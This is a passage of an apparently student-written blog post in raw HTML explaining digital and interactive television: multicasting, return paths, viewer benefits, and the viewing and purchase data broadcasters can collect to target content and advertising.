<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">1700<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">3,400,000<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">24<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">81.6<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">32<o:p></o:p></span></div>
</td>
<td style="padding: 2.25pt 2.25pt 2.25pt 2.25pt;"><div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">2611.2<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><u><span style="font-family: Arial, Helvetica, sans-serif; font-size: 16pt; line-height: 115%;">Benefits
of Digital Television</span></u></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Digital televisions work on small bandwidth and give
the advantage of multicasting and data casting to the broadcaster. By
multicasting the broadcaster is able to broadcast the programs to different
viewers at the same time. It is like storing several files on one single DVD.
The broadcaster similarly is able to broadcast several programs on one channel.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">The broadcaster or the cable system operator can
cast data on the channel along with the programs. Thus it gives the advantage
to the cable operator to display different type of information which may be
related to the price changes in the merchandise store or the list of the
programs that are about to be shown.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">We can use the scart lead to record the programs on
the digital television. If we have some important appointment when one of our
favorite program is aired or have to go shopping then all we have to do is get
a digital video recorder that provide you with the facility to record the
programs so that we can watch them later. But just check the capacity of the
DVR to record the live TV. They come in different capacity and we can buy them
on the basis of your choice and requirement.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Can watch more number of channels in Digital
television than on an analog television. The picture is clearer, sharp with
high resolution, the sound quality is better.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBq3xtfOtmAeMoQWOFnrgl1Q3WiyQCIPySRXen3d89GM5N66ITpm8VNyHaBxFMm764ATB2qjCohkjrBbaTdNxdDEzEDZGNzZOaiMWtj4QLHB7tStTxM927UJ9NkNKRO4LTLuECFDjM1Qs/s1600/digital-tv-multicasting.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBq3xtfOtmAeMoQWOFnrgl1Q3WiyQCIPySRXen3d89GM5N66ITpm8VNyHaBxFMm764ATB2qjCohkjrBbaTdNxdDEzEDZGNzZOaiMWtj4QLHB7tStTxM927UJ9NkNKRO4LTLuECFDjM1Qs/s400/digital-tv-multicasting.gif" width="400" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">An important benefit of the switch to all-digital
broadcasting is that it freed up parts of the valuable broadcast spectrum for
public safety communications (such as police, fire departments, and rescue
squads). Also, some of the spectrum can now be auctioned to companies that will
be able to provide consumers with more advanced wireless services (such as
wireless broadband).<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Consumers also get benefits because digital
broadcasting allows stations to give improved picture and sound quality, and
digital is much more efficient than analog. For example, rather than being
limited to providing one analog program, a broadcaster is able to offer a super
sharp High Definition (HD) digital program or multiple Standard Definition (SD)
digital programs simultaneously through a process called “multicasting.”<o:p></o:p></span></div>
<div class="MsoNormal">
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">“Multicasting
allows broadcast stations to offer several channels of digital programming at
the same time, using the same amount of spectrum required for one analog
program. So, for example, while a station broadcasting in analog on channel 7
is only able to offer viewers one program, a station broadcasting in digital on
channel 7 can offer viewers one digital program on channel 7-1, a second
digital program on channel 7-2, a third digital program on channel 7-3, and so
on. This means more programming choices for viewers. Further, DTV provides
interactive video and data services that were not possible with analog
technology.”<o:p></o:p></span></i></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4n15aHQNZesOrSh-Qq2FCEu7XsIEfK2_75bx5Bl7ohBFf66XzR1PewIPFHNvkni5MleI6CiNW-uj6F3RnvB8FyNWQcKnx9sOSKr9qBYWTVBrkipdPsXPHHzYdZ4M8AoPacpevuOhxrko/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4n15aHQNZesOrSh-Qq2FCEu7XsIEfK2_75bx5Bl7ohBFf66XzR1PewIPFHNvkni5MleI6CiNW-uj6F3RnvB8FyNWQcKnx9sOSKr9qBYWTVBrkipdPsXPHHzYdZ4M8AoPacpevuOhxrko/s400/11.jpg" width="365" /></span></a></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><u><span style="font-family: Arial, Helvetica, sans-serif; font-size: 16pt; line-height: 115%;">Interactive
Television<o:p></o:p></span></u></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; margin-left: 0in; margin-right: 0in; margin-top: 6pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">Interactive television (iTV) is any television
with what is called a “return path”. Information flows not only from
broadcaster to viewer, but also back from viewer to broadcaster. Another
feature common to all iTV systems is the ability to offer each TV set, or each
viewer who uses that TV set, a different choice of content.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; margin-left: 0in; margin-right: 0in; margin-top: 6pt; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/PeZLPbCQ-n4" width="560"></iframe></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; margin-left: 0in; margin-right: 0in; margin-top: 6pt;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt;">There are different hardware configurations and
it is possible to build a crude interactive service using analog
systems. But the type of systems now being offered, that will dramatically
change how viewers live, are digital – either cable or satellite.<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5s2Y0Nt9dc1AmCPJhIyVMLK-qnCfuxDgFW6OW9xACjMX5h0rEnM4DKdICeZkIkAcriBq2r3xjH2rUGEgo6rOkkLzawFhZWyTMdpOjX4t6mlJ2XYJE9cioUIhSQZWTIlwSoG_Vr-1VEwc/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5s2Y0Nt9dc1AmCPJhIyVMLK-qnCfuxDgFW6OW9xACjMX5h0rEnM4DKdICeZkIkAcriBq2r3xjH2rUGEgo6rOkkLzawFhZWyTMdpOjX4t6mlJ2XYJE9cioUIhSQZWTIlwSoG_Vr-1VEwc/s400/11.jpg" width="400" /></span></a></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; margin-left: 0in; margin-right: 0in; margin-top: 6pt; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">This "return path," return channel or
"back channel" can be by telephone, mobile SMS (text messages),
radio, digital subscriber lines (ADSL) or cable.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Cable TV viewers receive their programs via a cable,
and in the integrated cable return path enabled platforms, they use the same
cable as a return path.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Satellite viewers (mostly) return information to the
broadcaster via their regular telephone lines. They are charged for this
service on their regular telephone bill. An Internet connection via ADSL, or
other, data communications technology, is also being increasingly used.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 18px;"><iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/RSk5DhxQHLo" width="560"></iframe></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="MsoNormal">
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">“Interactive
TV can also be delivered via a terrestrial aerial (Digital Terrestrial TV such
as 'Freeview' in the UK). In this case, there is often no 'return path' as such
- so data cannot be sent back to the broadcaster (so you could not, for
instance, vote on a TV show, or order a product sample). However, interactivity
is still possible as there is still the opportunity to interact with an
application which is broadcast and downloaded to the set-top box (so you could
still choose camera angles, play games etc.).<o:p></o:p></span></i></div>
<div class="MsoNormal">
<i><span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Increasingly
the return path is becoming a broadband IP connection, and some hybrid
receivers are now capable of displaying video from either the IP connection or
from traditional tuners. Some devices are now dedicated to displaying video
only from the IP channel, which has given rise to IPTV - Internet Protocol
Television. The rise of the "broadband return path" has given new relevance
to Interactive TV, as it opens up the need to interact with Video on Demand
servers, advertisers, and web site operators.”<o:p></o:p></span></i></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">In interactive television there can be many types of
interactions. The interaction may be based on technology or it may be based on
the usage. Considering these facts interaction television’s interaction can
division into several parts.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l4 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">1.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Interactivity
with television set<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">This can be identifies as the
simplest form of interaction. This is happened through a remote control to fast
forward, pause, rewind or skip commercials etc.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l4 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">2.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Interaction
with the content of television programs<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Here the viewer is not interacting
with television set. He interacts with the program. So users can comment,
message and do forum discussions regarding programs.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l4 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">3.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Interactivity
with television related content.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">In this viewers can get information
about weather, sports, news etc using the interactive television.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwm0_gJyW36xArP90x_P7RIKoSOqvrjKM1EG8h078SVBcey2Tfhgbv2n4b7jScF0p0nsmg-_hK-Bbmv8enigjk5JLgxsgMtoyHi5IElRmQfptJoFUqcM6sbjzeajg1b3zGrOfpXIvqT-4/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwm0_gJyW36xArP90x_P7RIKoSOqvrjKM1EG8h078SVBcey2Tfhgbv2n4b7jScF0p0nsmg-_hK-Bbmv8enigjk5JLgxsgMtoyHi5IElRmQfptJoFUqcM6sbjzeajg1b3zGrOfpXIvqT-4/s1600/11.jpg" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<b><u><span style="font-family: Arial, Helvetica, sans-serif; font-size: 16pt; line-height: 115%;">Benefits
of Interactive Television</span></u></b></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">In interactive television viewer can have various
benefits and not only the viewer can so many parties benefit from interactive
television systems.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMWXUGVPdyCyyZv2WnzU8_J_g6eL6j8D24AVba1Az1tukCd8-5rz31suGqisrg-zmqSc635xAAqDjPEFcCw8Xprw-7C0C5KtrNO2_E13APQ6DOHPPpI6EAlvO5rtmB-IZCbi9vjjZZjo/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSMWXUGVPdyCyyZv2WnzU8_J_g6eL6j8D24AVba1Az1tukCd8-5rz31suGqisrg-zmqSc635xAAqDjPEFcCw8Xprw-7C0C5KtrNO2_E13APQ6DOHPPpI6EAlvO5rtmB-IZCbi9vjjZZjo/s320/11.jpg" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Interactive television is more viewers centric. Viewers
get more live and interactive television experience and even it can be used for
educational purposes. All the functions in interactive television that eases or
enhance the interactivity of the user can be measured as a benefit for the
viewer. As an example id there is online shopping facility the viewer can shop
using the television. Some benefits from interactive television are,<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">1.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Getting
more information on anything appears in the screen.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">2.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Online
shopping: purchasing and ordering<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">3.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Various
services: email, diary, chat, weather, stock market, quotes, viewing planner,
child viewing filter etc<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">4.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Forums
and survays: Viewer requests for information, pop-quizzes, viewer opinion
polls, electronic program guide preferences, program suggestion forms, game or
activity entry forms.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo4; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">5.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Games
and activities: can chose varios types of games such as action, fantacy etc<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Apart from that many parties benefits from and
create benefits from interactive TV’s. Because of its high technological usage
those parties can inspect the viewer easily and make decisions. This can be
service provider, marketer or a researcher for many purposes. I will try to
look from the service providers perspective how to benefit from data gathered.
Service provider or the broadcaster is the main entity who can collect data and
analyze. He can use these to sell more air time or he can sell data or reports
made after analyzing data to many parties like marketers, researchers etc. <o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Different kinds of data can be gathered from an
interactive television this is a major benefit. The data can be gathered are,<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">1.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Shows
Watched<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">2.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Commercials
Watched: Which viewed to completion, which viewed in part, time spent<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">3.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Commercials
Clicked: Whenever the viewer hit a "tell me more" icon, time spent
reading or watching the further information.
Other clicks to other information screens.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">4.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Commercial
Purchases: Which ads persuaded a viewer to click on an order form, which ads
lead all the way to an online sale.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">5.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Services
Used: Which services, such as email, diary, chat, weather, stock market quotes,
shopping, viewing planner, child viewing filter etc. How often used, every
keystroke typed in to any of the services.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">6.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Online
Shopping: What viewer has browsed. What is the things viewer almost bought or
requested more information.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">7.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Forms
and Surveys used <o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l2 level1 lfo3; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">8.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Games
and activities used<o:p></o:p></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1N1Pqak7o7XnWWXiYZlmHVttNqye3A6otgf81EtVi5BjUDk4qnR4nTvmad7Rhu6FOHRUx-TAFY90zpQaMG17fiL7ZZPQMzFZq68JadUIB2zOQSplqZY43BbRYzqqLg7EX-CdfQhTu9l8/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1N1Pqak7o7XnWWXiYZlmHVttNqye3A6otgf81EtVi5BjUDk4qnR4nTvmad7Rhu6FOHRUx-TAFY90zpQaMG17fiL7ZZPQMzFZq68JadUIB2zOQSplqZY43BbRYzqqLg7EX-CdfQhTu9l8/s400/11.jpg" width="400" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Using these collected data analyzers can analyse and
create various kind of reports for further decision making. Such reports
include,<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">1.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Viewing
hours over week<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">2.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Channel
choice over week<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">3.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Loyalty
to shows<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">4.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Who
watches a certain show or shows, in order by wealth of neighborhood<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">5.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Advertisements
missed or seen<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">6.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Viewer
restlessness by type of program<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">7.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Viewer
restlessness by type of advertisement<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo5; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">8.<span style="font: normal normal normal 7pt/normal 'Times New Roman';"> </span></span><span style="font-size: 12pt; line-height: 115%;">Response
to big events<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">These reports are very useful. They describe behaviors in each viewer that
broadcasters and advertisers have long dreamt of knowing. How many people are
watching a some kind of a program, for how long and how many of them live in
wealthy neighborhoods? Who are
they? What are their addresses? It has been shown that the more involved viewers
are in what they watch; the more likely they are to accept advertising
messages. Interactive TV has been shown
to increase involvement, but can also be used to measure it in clicks and
keystrokes.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTghnf9o9gHPxp1FuP-7hPOHjwM45veWjIebK03d1Ui4RDAVxfU3ntfMxGywnywbgrKrpEoVW2EFuf0zalbrCOe4ftEQM2EENQ0ZhoEXzkGClhKPvuqwdzbXv3gUhbr72yGAELOcpuqI/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxTghnf9o9gHPxp1FuP-7hPOHjwM45veWjIebK03d1Ui4RDAVxfU3ntfMxGywnywbgrKrpEoVW2EFuf0zalbrCOe4ftEQM2EENQ0ZhoEXzkGClhKPvuqwdzbXv3gUhbr72yGAELOcpuqI/s400/11.jpg" width="312" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12pt; line-height: 115%;">Using these data interactive television can do so
many things. Those can be benefits for both viewer and service provider or any
other party. Main thing it can do is send content to an individual viewer
depending on their usage.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Programs offered – Every viewer will see
their own trailers, teasers and pop-up reminders. When they tune in to a show, they may even
see their own version of it. These
techniques will be especially effective to do product placements.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">News - Any program or service that
offers information can be customized into special issues, local editions and
individualized bulletins. Headlines,
pictures, text and video can all be changed from minute to minute, person to
person.<o:p></o:p></span></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l5 level1 lfo6; text-indent: -.25in;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12pt; line-height: 115%;">·<span style="font: normal normal normal 7pt/normal 'Times New Roman';">
</span></span><span style="font-size: 12pt; line-height: 115%;">Commercials - Infomercials can be
tailored to provide different information to each viewer, depending on what is
likely to influence their buying decisions.
